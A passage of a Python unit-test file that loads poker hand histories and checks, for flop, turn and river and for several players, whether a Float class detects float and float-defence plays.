file = 'in2gr3r__F__XBFC__T__XX__R__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XX__R__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XX__R__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XBC__R__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
def test_float_def_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in0gr2r__F__BC__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCC__T__XXBFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCF__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCF__T__XBRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__BRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
